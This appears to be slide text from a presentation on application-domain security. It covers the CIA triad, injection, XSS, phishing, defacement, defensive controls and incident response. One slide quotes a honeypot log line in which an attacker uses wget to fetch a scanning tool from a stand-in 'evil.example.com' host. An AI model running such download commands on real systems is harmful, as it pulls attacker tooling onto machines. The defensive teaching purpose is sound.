Availability

advertisement
Birlin, Bonds, Ramani and Reeds
The system/application domain consists of all of a business’s
mission-critical systems, applications, and data.
It is important to ensure that this domain is secure at all times,
otherwise a business could easily lose large amounts of sensitive
information as well as face the threat of having productivity
come to a halt. Common targeted systems and applications are
operating systems (desktop, server, and network), e-mail
applications and servers, Enterprise Resource Planning (ERP)
applications and systems, and web browsers.


Confidentiality: A requirement that private or
confidential information not be disclosed to
unauthorized individual.
This issues related to this are:



Network security protocols
Network authentication services
Data encryption services




HIPAA Fines
Sox Violations
Users will lose confidence that their data is not
secure.
Loss of customers.
Supply Chain Risk

Integrity: Data integrity is a requirement that
information and programs are changed only in
a specified and authorized manner. System
integrity is a requirement that a system
performs its intended function in an
unimpaired manner, free from deliberate or
inadvertent unauthorized manipulation of the
system. Issues related to this are:



Firewall services
Communications security management
Intrusion detection services





Data Corruption
Unsure of good points to roll back to.
Loss of confidence in users and customers
Possible HIPAA or Sox Fines.
Users may not see accurate data, much less
believe the data!


Availability: A requirement intended to ensure
that systems work promptly and service is not
denied to authorized
users.
Typically, non critical applications should stay
available 99.5% of the time, and critical are
99.9%.

Critical apps typically are:
 Supply Chain
 HR
 Accounting

Issues related to availability are:



Fault tolerance for data availability (back-ups,
redundant disk systems)
Acceptable log-ins and operating process
performance
Reliable and interoperable security processes and
network security mechanisms3




Workers are not able to complete their tasks in
a timely manner.
Loss of confidence from customers and users.
Calls and services abandoned by users.
Users and Customers will find a provider that
can meet their SLA Requirements!


Up to 20 years prison Time.
Fines from $100k to $5M.









physical environment of the system
the personnel
management
administration procedures and security
measures within the organization
business operation and service delivery
hardware
software
communication equipment and facilities
and their combinations.




Surveillance Cameras not installed in server
rooms to deter unauthorized access.
Application and Database servers not placed in
a server room which is secured by key pad or
lock.
Hardware loggers
Application Servers sitting under people’s
desks!



Employees who improperly download
software to their machines run the risk of
installing malware with it.
Employee machines should not be issued with
employee rights so that they can install
unauthorized software.
Employee’s machines installs can be monitored
using a tool such as Eracent.

There is a tendency to grant too much rights to
users.

Default should not be an administrator, but a lesser
set of roles.

Systems administrators do not set up firewalls,
servers, databases and OS software properly to
prevent attacks.

The reason is that additional security protocols adds
a higher level of rigor in day to day operations.

Sensitive Folders use common names, such as
Admin. Tells your attacker exactly where to
look.



Sadly, many recommendation guidelines tell your
user to do exactly this!
Improper Folder setup, allowing your attacker
to browse the contents of your site.
Improper setup of error handling, giving a
stack trace of your code to the outside user
when exceptions thrown.


As the name suggests, this vulnerability allows
an attacker to run arbitrary, system level code
on the vulnerable server and retrieve any
desired information contained therein.
Improper coding errors lead to this
vulnerability.
Products which had this: phpbb, Invision Board,
Cpanel, Paypal cart, Drupal, and many others



Default Configuration of many sites are setup
in a way that users of the site have full
privileges!
Sensitive Data is commonly exposed to the
outside world.
Software not kept up to date.


Some server admins are not vigililent in
ensuring the latest versions of application
software are installed on desktops.
Last year saw some particularly attacks
through Java, Acrobat and Flash. These attacks
could have been prevented by proper patching.

There are a multitude of add ons for your web
applications, however web administrators do
not properly lock down these user based
reports.


Worldwide, 170K Awstats reports are available.
ELMAH Error handling can be found by good
attackers which give full stack traces!



Application Domain is a high risk domain now.
Improper and lax security techniques plus high
reward targets means risks will continue
through the future
Users with low knowledge base also means
attackers have ripe opportunities there also.



Nonprofit organization not attached to any
software company.
Releases a list of top 10 security threats on an
annual basis, for both desktop and mobile
platforms.
Core Purpose: Be the thriving global
community that drives visibility and evolution
in the safety and security of the world’s
software.


Code injection is the exploitation of a
computer bug that is caused by processing
invalid data. Code injection can be used by an
attacker to introduce (or "inject") code into a
computer program to change the course of
execution. The results of a code injection attack
can be disastrous. For instance, code injection is
used by some computer worms to propagate.
SQL, LDAP and OS Injection still rank as the #1
threat per OWASP.



Allows attackers to inject javascript code into
your hosted page, thus executing malware on
your own site.
Textboxes are where this code can be inserted.
Data saved into the database can then be used
against other users of the site. In other words,
I’m hosting my own malware!
84% of all security vulnerabilities as
documented by Symantec

https://www.youtube.com/watch?v=qO3iwA
xkPxE

https://www.youtube.com/watch?v=FwIUkA
wKzG8


Allows attackers to compromise session tokens,
keys to assume other user’s identities.
If the session ID is compromised, attackers can
impersonate other users on the system.




Phishing is a way of attempting to acquire information such as
usernames, passwords, and credit card details by masquerading as a
trustworthy entity in an electronic communication.
Spear phishing Phishing attempts directed at specific individuals or
companies have been termed spearphishing.[35] Attackers may gather
personal information about their target to increase their probability of
success.
Clone phishing A type of phishing attack whereby a legitimate, and
previously delivered, email containing an attachment or link has had its
content and recipient address(es) taken and used to create an almost
identical or cloned email. The attachment or Link within the email is
replaced with a malicious version and then sent from an email address
spoofed to appear to come from the original sender. It may claim to be a
resend of the original or an updated version to the original. This
technique could be used to pivot (indirectly) from a previously infected
machine and gain a foothold on another machine, by exploiting the social
trust associated with the inferred connection due to both parties receiving
the original email.
Whaling Several recent phishing attacks have been directed specifically at
senior executives and other high profile targets within businesses, and the
term whaling has been coined for these kinds of attacks



The motivation behind defacing websites is to
obtain peer recognition in the attacker’s
community.
Also, used by politically motivated hacktivists
or cyber protestors
Usually done by SQL Injector or Compromised
FTP


Much more difficult to defend against.
Typically has to do with loss of reputation in
the community at large which causes these
types of attacks.

PHPShell is a PHP script
which allows shell
commands to be executed
on a web server. Typically
the PHPShell script is
protected by a password so
only the server
administrator can access it.
We deployed honeypots
that advertise an
unrestricted PHPShell
application, which attackers
often tried to exploit.



Among other tools, attackers commonly downloaded and attempted
to use a variant of pscan. Pscan is an efficient port scanner that can
discover hosts which are listening on a particular port. Typically, the
attacker would run the tool, obtain a list of hosts with the port open
and then proceed to run an exploit tool against the list of hosts.
Date: 2006-09-09 12:20:40
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en US;
rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Command: wget http://evil.example.com/linux/fast.tgz
Port Scans are commonly run. Common ports to open are typically
scanned, like 80, 8080, 8081.



What is our defense strategy if we are
attacked?
How are we preparing to prevent an attack?
Who is engaged in the defense of our
company?


Application Scanning Tools: Code analysis can
be done using a tool such as HP Fortify.
Simulated Attacks: Allows all attacks to be
performed on the site using a tool such as HP
WebInspect.

First rule- NEVER TRUST YOUR USERS.

Validation Techniques from MS Stack
 Date Range
 Custom Validation
 Numeric Range Validation
 Regular Expression Validation
 Comparison Validation




String encoding of data before it goes to the
server. Otherwise known as sanitizing your
inputs.
Antixss for the MS Stack and AntiSami for the
Java domain
Data from the web: I'm here to stay!
Encoded: I%27m%20here%20to%20stay!




PII Should always be encrypted in the
database.
Credit Card Information should always be
encrypted.
SSL Should be used for all sensitive
communications between your server and user.
Proper VPN Tunnels should be set up for
remote users



A security department should be implemented
which monitors all incoming and outgoing
traffic.
Monitors all traffic to the enterprise
Should be a vigilant process instead of
addressing attacks (no more whack a mole)



Users that are logged into the website should
have some sort of audit trail on their actions, as
to determine the history of these users.
Database log of inserts, adds and deletes allows
us to track malicious activity by insiders.
ELMAH Audit trail allows us to provide error
logging hidden from the user.





Be ready to force enterprise wide password
changes should an attacker obtain elevated
privileges.
Isolate the environment from the Internet.
Block egress traffic to known malicious C2 IP
addresses and domains.
Block dynamic DNS providers.
Rebuild or replace compromised systems.



Do employees know what to do if their
machines are compromised?
Do employees know how to tell good emails
from bad ones?
Do employees know what to do with
suspicious emails?







Define computers, e-mail, Internet, and so on as broadly as possible, with
specifics given, but not limited to such specifics
Remind employees that not only job loss, but also civil liability and
criminal prosecution may result from certain actions (illegal
pornography, participation in spamming operations or other scams,
involvement in computer hacking (see 18 U.S.C. § 1030, among other
laws))
Company needs to reserve the right to monitor all computer usage at all
times for compliance with the policy
Right to inspect an employee's computer, HD, floppy disks, and other
media at any time
Right to withdraw access to computers, Internet, e-mail if needed
Consider prohibiting camera phones (also called cell phone cameras);
such phones have been implicated in gross invasions of other employees'
privacy and in theft of company secrets
Make sure employees know they have no reasonable expectation of
privacy in their use of the company's electronic resources, since it is all
company property and to be used only for job-related purposes


So our company’s assets have been
compromised. What’s next?
The best line of defense is having a response
strategy in place, from compromised assets to
whole system loss.





1. Identify the last known time our system’s
data was stable.
2. Pull the data back ups from that time,
whether it be on disk or by tape.
3. Restore the data to the last known good data
point.
Notify customers and users through out the
process of the data loss.
Self-Report to authorities of possible HIPAA or
Sox Violations.



Notify customer immediately of breach, and
possible data leakage, and advise them to
change their passwords.
Identify the source of the breach, through
system logs, network logs and data logs.
Notify authorities and press of the breach to
stay in front of the situation.



Identify the source of the system outage.
Acquire proper backups of systems to stand up
in a different physical location. Restore our
systems to new servers if need be.
Blackhole DNS attacks to spoofed IP Address.
Download